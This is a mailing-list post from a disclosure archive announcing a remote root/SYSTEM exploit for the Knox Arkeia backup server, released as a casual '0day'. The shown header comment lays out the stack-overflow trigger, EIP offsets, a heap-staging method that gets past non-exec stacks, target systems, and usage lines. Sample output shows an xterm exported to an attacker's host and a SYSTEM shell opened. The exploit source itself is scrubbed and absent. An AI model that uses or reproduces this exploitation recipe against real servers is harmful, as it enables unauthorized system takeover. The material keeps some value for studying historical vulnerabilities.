| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: guldens111 at hotmail.com (John Doe) Subject: Knox Arkeia remote root/system exploit 0day cuz i'm bored /* * Knox Arkeia Server Backup * arkeiad local/remote root exploit * Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE * Works up to current version 5.3.x * * --------------- * * Linux x86: * ./arksink2 <arkeia_host> <target_type> <display> * * Exports an xterm to the box of your choosing. Make sure to "xhost +" on * the box you're exporting to. * * A stack overflow is in the processing of a type 77 request. EIP is actually * overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we * have to write past EIP and insert a "safe" value. Put this value behind your * NOP+sc return address so it doesn't mess with the sled. * * Since the buffer is so small, we initially send an invalid packet that ends * up on the heap a second before the overflow happens. If it is a high traffic * Arkeia server the heap might be a bit volatile, so play around with putting * nops+sc after the overwritten pointer. The heap method avoids non-exec stack * protection, however. * * Includes targets for RH8 and RH7.2 * * [user@...t user]$ ./prog 192.168.1.2 1 192.168.1.1:0 * [*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit * [*] Attacking LINUX system * [*] Exporting xterm to 192.168.1.1:0 * [*] Connected to 192.168.1.2:617 NOP+shellcode socket * [*] Connected to 192.168.1.2:617 overflow socket * [*] Sending nops+shellcode * [*] Done, sleeping * [*] Done, check for xterm * * * --------------- * * Windows x86: * ./prog <host> <target> <offset> * * Spawns a shell on port 80 of the remote host * * EIP is overwritten beginning with the 25th byte after the header. Since Windows * is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to * write an extra null past EIP. Another advantage here is that we can put all our * nops and shellcode in the same packet, but after the NULL. They will not be copied * onto the stack (and therefore not munge the pointer after it) but will remain * in memory as a raw packet. Fire up ollydbg, search for your nops and voila. * * [user@...t user]$ ./arksink2 192.168.1.2 3 0 * [*] Knox Arkeia <= v5.3.x remote SYSTEM exploit * [*] Attacking Windows system * [*] Spawning shell on 192.168.1.2:80 * [*] Connected to 192.168.1.2:617 overflow socket * [*] Sending overflow * [*] Attempting to get remote shell, try #0 * [!] connect: Resolver Error 0 (no error) * [*] Attempting to get remote shell, try #1 * [!] connect: Resolver Error 0 (no error) * [*] Attempting to get remote shell, try #2 * [!] connect: Resolver Error 0 (no error) * [*] Attempting to get remote shell, try #3 * [!] connect: Resolver Error 0 (no error) * [*] Attempting to get remote shell, try #4 * [*] Success, enjoy * Microsoft Windows 2000 [Version 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32>whoami * whoami * SYSTEM * * C:\WINNT\system32> * * * --------------- * */ _________________________________________________________________ Is your PC infected? Get a FREE online computer virus scan from McAfeeŽ Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963 -------------- next part -------------- A non-text attachment was scrubbed... Name: arksink2.c Type: text/x-csrc Size: 12802 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050218/1dc30ada/arksink2.bin
Powered by blists - more mailing lists